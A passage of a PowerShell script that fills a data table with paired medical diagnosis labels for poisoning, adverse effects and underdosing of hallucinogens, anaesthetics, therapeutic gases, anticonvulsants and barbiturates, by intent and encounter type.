$DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], intentional self-harm","Poisoning by unspecified psychodysleptics [hallucinogens], intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], intentional self-harm","Poisoning by unspecified psychodysleptics [hallucinogens], intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], assault","Poisoning by unspecified psychodysleptics [hallucinogens], assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], assault","Poisoning by unspecified psychodysleptics [hallucinogens], assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], assault","Poisoning by unspecified psychodysleptics [hallucinogens], assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], undetermined","Poisoning by unspecified psychodysleptics [hallucinogens], undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], undetermined","Poisoning by unspecified psychodysleptics [hallucinogens], undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychodysleptics [hallucinogens], undetermined","Poisoning by unspecified psychodysleptics [hallucinogens], undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychodysleptics [hallucinogens]","Adverse effect of unspecified psychodysleptics [hallucinogens], initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychodysleptics [hallucinogens]","Adverse effect of unspecified psychodysleptics [hallucinogens], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychodysleptics [hallucinogens]","Adverse effect of unspecified psychodysleptics [hallucinogens], sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychodysleptics","Underdosing of unspecified psychodysleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychodysleptics","Underdosing of unspecified psychodysleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychodysleptics","Underdosing of unspecified psychodysleptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], accidental (unintentional)","Poisoning by other psychodysleptics [hallucinogens], accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], accidental (unintentional)","Poisoning by other psychodysleptics [hallucinogens], accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], accidental (unintentional)","Poisoning by other psychodysleptics [hallucinogens], accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], intentional self-harm","Poisoning by other psychodysleptics [hallucinogens], intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], intentional self-harm","Poisoning by other psychodysleptics [hallucinogens], intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], intentional self-harm","Poisoning by other psychodysleptics [hallucinogens], intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], assault","Poisoning by other psychodysleptics [hallucinogens], assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], assault","Poisoning by other psychodysleptics [hallucinogens], assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], assault","Poisoning by other psychodysleptics [hallucinogens], assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], undetermined","Poisoning by other psychodysleptics [hallucinogens], undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], undetermined","Poisoning by other psychodysleptics [hallucinogens], undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychodysleptics [hallucinogens], undetermined","Poisoning by other psychodysleptics [hallucinogens], undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychodysleptics [hallucinogens]","Adverse effect of other psychodysleptics [hallucinogens], initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychodysleptics [hallucinogens]","Adverse effect of other psychodysleptics [hallucinogens], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychodysleptics [hallucinogens]","Adverse effect of other psychodysleptics [hallucinogens], sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychodysleptics","Underdosing of other psychodysleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychodysleptics","Underdosing of other psychodysleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychodysleptics","Underdosing of other psychodysleptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, accidental (unintentional)","Poisoning by inhaled anesthetics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, accidental (unintentional)","Poisoning by inhaled anesthetics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, accidental (unintentional)","Poisoning by inhaled anesthetics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, intentional self-harm","Poisoning by inhaled anesthetics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, intentional self-harm","Poisoning by inhaled anesthetics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, intentional self-harm","Poisoning by inhaled anesthetics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, assault","Poisoning by inhaled anesthetics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, assault","Poisoning by inhaled anesthetics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, assault","Poisoning by inhaled anesthetics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, undetermined","Poisoning by inhaled anesthetics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, undetermined","Poisoning by inhaled anesthetics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by inhaled anesthetics, undetermined","Poisoning by inhaled anesthetics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of inhaled anesthetics","Adverse effect of inhaled anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of inhaled anesthetics","Adverse effect of inhaled anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of inhaled anesthetics","Adverse effect of inhaled anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of inhaled anesthetics","Underdosing of inhaled anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of inhaled anesthetics","Underdosing of inhaled anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of inhaled anesthetics","Underdosing of inhaled anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, accidental (unintentional)","Poisoning by intravenous anesthetics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, accidental (unintentional)","Poisoning by intravenous anesthetics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, accidental (unintentional)","Poisoning by intravenous anesthetics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, intentional self-harm","Poisoning by intravenous anesthetics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, intentional self-harm","Poisoning by intravenous anesthetics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, intentional self-harm","Poisoning by intravenous anesthetics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, assault","Poisoning by intravenous anesthetics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, assault","Poisoning by intravenous anesthetics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, assault","Poisoning by intravenous anesthetics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, undetermined","Poisoning by intravenous anesthetics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, undetermined","Poisoning by intravenous anesthetics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by intravenous anesthetics, undetermined","Poisoning by intravenous anesthetics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of intravenous anesthetics","Adverse effect of intravenous anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of intravenous anesthetics","Adverse effect of intravenous anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of intravenous anesthetics","Adverse effect of intravenous anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of intravenous anesthetics","Underdosing of intravenous anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of intravenous anesthetics","Underdosing of intravenous anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of intravenous anesthetics","Underdosing of intravenous anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, accidental (unintentional)","Poisoning by unspecified general anesthetics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, accidental (unintentional)","Poisoning by unspecified general anesthetics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, accidental (unintentional)","Poisoning by unspecified general anesthetics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, intentional self-harm","Poisoning by unspecified general anesthetics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, intentional self-harm","Poisoning by unspecified general anesthetics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, intentional self-harm","Poisoning by unspecified general anesthetics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, assault","Poisoning by unspecified general anesthetics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, assault","Poisoning by unspecified general anesthetics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, assault","Poisoning by unspecified general anesthetics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, undetermined","Poisoning by unspecified general anesthetics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, undetermined","Poisoning by unspecified general anesthetics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified general anesthetics, undetermined","Poisoning by unspecified general anesthetics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified general anesthetics","Adverse effect of unspecified general anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified general anesthetics","Adverse effect of unspecified general anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified general anesthetics","Adverse effect of unspecified general anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified general anesthetics","Underdosing of unspecified general anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified general anesthetics","Underdosing of unspecified general anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified general anesthetics","Underdosing of unspecified general anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, accidental (unintentional)","Poisoning by other general anesthetics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, accidental (unintentional)","Poisoning by other general anesthetics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, accidental (unintentional)","Poisoning by other general anesthetics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, intentional self-harm","Poisoning by other general anesthetics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, intentional self-harm","Poisoning by other general anesthetics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, intentional self-harm","Poisoning by other general anesthetics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, assault","Poisoning by other general anesthetics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, assault","Poisoning by other general anesthetics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, assault","Poisoning by other general anesthetics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, undetermined","Poisoning by other general anesthetics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, undetermined","Poisoning by other general anesthetics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other general anesthetics, undetermined","Poisoning by other general anesthetics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other general anesthetics","Adverse effect of other general anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other general anesthetics","Adverse effect of other general anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other general anesthetics","Adverse effect of other general anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other general anesthetics","Underdosing of other general anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other general anesthetics","Underdosing of other general anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other general anesthetics","Underdosing of other general anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, accidental (unintentional)","Poisoning by local anesthetics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, accidental (unintentional)","Poisoning by local anesthetics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, accidental (unintentional)","Poisoning by local anesthetics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, intentional self-harm","Poisoning by local anesthetics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, intentional self-harm","Poisoning by local anesthetics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, intentional self-harm","Poisoning by local anesthetics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, assault","Poisoning by local anesthetics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, assault","Poisoning by local anesthetics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, assault","Poisoning by local anesthetics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, undetermined","Poisoning by local anesthetics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, undetermined","Poisoning by local anesthetics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local anesthetics, undetermined","Poisoning by local anesthetics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of local anesthetics","Adverse effect of local anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of local anesthetics","Adverse effect of local anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of local anesthetics","Adverse effect of local anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of local anesthetics","Underdosing of local anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of local anesthetics","Underdosing of local anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of local anesthetics","Underdosing of local anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, accidental (unintentional)","Poisoning by unspecified anesthetic, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, accidental (unintentional)","Poisoning by unspecified anesthetic, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, accidental (unintentional)","Poisoning by unspecified anesthetic, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, intentional self-harm","Poisoning by unspecified anesthetic, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, intentional self-harm","Poisoning by unspecified anesthetic, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, intentional self-harm","Poisoning by unspecified anesthetic, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, assault","Poisoning by unspecified anesthetic, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, assault","Poisoning by unspecified anesthetic, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, assault","Poisoning by unspecified anesthetic, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, undetermined","Poisoning by unspecified anesthetic, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, undetermined","Poisoning by unspecified anesthetic, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified anesthetic, undetermined","Poisoning by unspecified anesthetic, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified anesthetic","Adverse effect of unspecified anesthetic, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified anesthetic","Adverse effect of unspecified anesthetic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified anesthetic","Adverse effect of unspecified anesthetic, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified anesthetics","Underdosing of unspecified anesthetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified anesthetics","Underdosing of unspecified anesthetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified anesthetics","Underdosing of unspecified anesthetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, accidental (unintentional)","Poisoning by therapeutic gases, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, accidental (unintentional)","Poisoning by therapeutic gases, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, accidental (unintentional)","Poisoning by therapeutic gases, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, intentional self-harm","Poisoning by therapeutic gases, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, intentional self-harm","Poisoning by therapeutic gases, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, intentional self-harm","Poisoning by therapeutic gases, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, assault","Poisoning by therapeutic gases, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, assault","Poisoning by therapeutic gases, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, assault","Poisoning by therapeutic gases, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, undetermined","Poisoning by therapeutic gases, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, undetermined","Poisoning by therapeutic gases, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by therapeutic gases, undetermined","Poisoning by therapeutic gases, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of therapeutic gases","Adverse effect of therapeutic gases, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of therapeutic gases","Adverse effect of therapeutic gases, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of therapeutic gases","Adverse effect of therapeutic gases, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of therapeutic gases","Underdosing of therapeutic gases, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of therapeutic gases","Underdosing of therapeutic gases, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of therapeutic gases","Underdosing of therapeutic gases, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, accidental (unintentional)","Poisoning by hydantoin derivatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, accidental (unintentional)","Poisoning by hydantoin derivatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, accidental (unintentional)","Poisoning by hydantoin derivatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, intentional self-harm","Poisoning by hydantoin derivatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, intentional self-harm","Poisoning by hydantoin derivatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, intentional self-harm","Poisoning by hydantoin derivatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, assault","Poisoning by hydantoin derivatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, assault","Poisoning by hydantoin derivatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, assault","Poisoning by hydantoin derivatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, undetermined","Poisoning by hydantoin derivatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, undetermined","Poisoning by hydantoin derivatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by hydantoin derivatives, undetermined","Poisoning by hydantoin derivatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of hydantoin derivatives","Adverse effect of hydantoin derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of hydantoin derivatives","Adverse effect of hydantoin derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of hydantoin derivatives","Adverse effect of hydantoin derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of hydantoin derivatives","Underdosing of hydantoin derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of hydantoin derivatives","Underdosing of hydantoin derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of hydantoin derivatives","Underdosing of hydantoin derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, accidental (unintentional)","Poisoning by iminostilbenes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, accidental (unintentional)","Poisoning by iminostilbenes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, accidental (unintentional)","Poisoning by iminostilbenes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, intentional self-harm","Poisoning by iminostilbenes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, intentional self-harm","Poisoning by iminostilbenes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, intentional self-harm","Poisoning by iminostilbenes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, assault","Poisoning by iminostilbenes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, assault","Poisoning by iminostilbenes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, assault","Poisoning by iminostilbenes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, undetermined","Poisoning by iminostilbenes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, undetermined","Poisoning by iminostilbenes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by iminostilbenes, undetermined","Poisoning by iminostilbenes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of iminostilbenes","Adverse effect of iminostilbenes, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of iminostilbenes","Adverse effect of iminostilbenes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of iminostilbenes","Adverse effect of iminostilbenes, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of iminostilbenes","Underdosing of iminostilbenes, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of iminostilbenes","Underdosing of iminostilbenes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of iminostilbenes","Underdosing of iminostilbenes, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, accidental (unintentional)","Poisoning by succinimides and oxazolidinediones, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, accidental (unintentional)","Poisoning by succinimides and oxazolidinediones, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, accidental (unintentional)","Poisoning by succinimides and oxazolidinediones, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, intentional self-harm","Poisoning by succinimides and oxazolidinediones, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, intentional self-harm","Poisoning by succinimides and oxazolidinediones, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, intentional self-harm","Poisoning by succinimides and oxazolidinediones, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, assault","Poisoning by succinimides and oxazolidinediones, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, assault","Poisoning by succinimides and oxazolidinediones, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, assault","Poisoning by succinimides and oxazolidinediones, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, undetermined","Poisoning by succinimides and oxazolidinediones, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, undetermined","Poisoning by succinimides and oxazolidinediones, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by succinimides and oxazolidinediones, undetermined","Poisoning by succinimides and oxazolidinediones, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of succinimides and oxazolidinediones","Adverse effect of succinimides and oxazolidinediones, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of succinimides and oxazolidinediones","Adverse effect of succinimides and oxazolidinediones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of succinimides and oxazolidinediones","Adverse effect of succinimides and oxazolidinediones, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of succinimides and oxazolidinediones","Underdosing of succinimides and oxazolidinediones, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of succinimides and oxazolidinediones","Underdosing of succinimides and oxazolidinediones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of succinimides and oxazolidinediones","Underdosing of succinimides and oxazolidinediones, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, accidental (unintentional)","Poisoning by barbiturates, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, accidental (unintentional)","Poisoning by barbiturates, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, accidental (unintentional)","Poisoning by barbiturates, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, intentional self-harm","Poisoning by barbiturates, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, intentional self-harm","Poisoning by barbiturates, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, intentional self-harm","Poisoning by barbiturates, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, assault","Poisoning by barbiturates, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, assault","Poisoning by barbiturates, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, assault","Poisoning by barbiturates, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by barbiturates, undetermined","Poisoning by barbiturates, 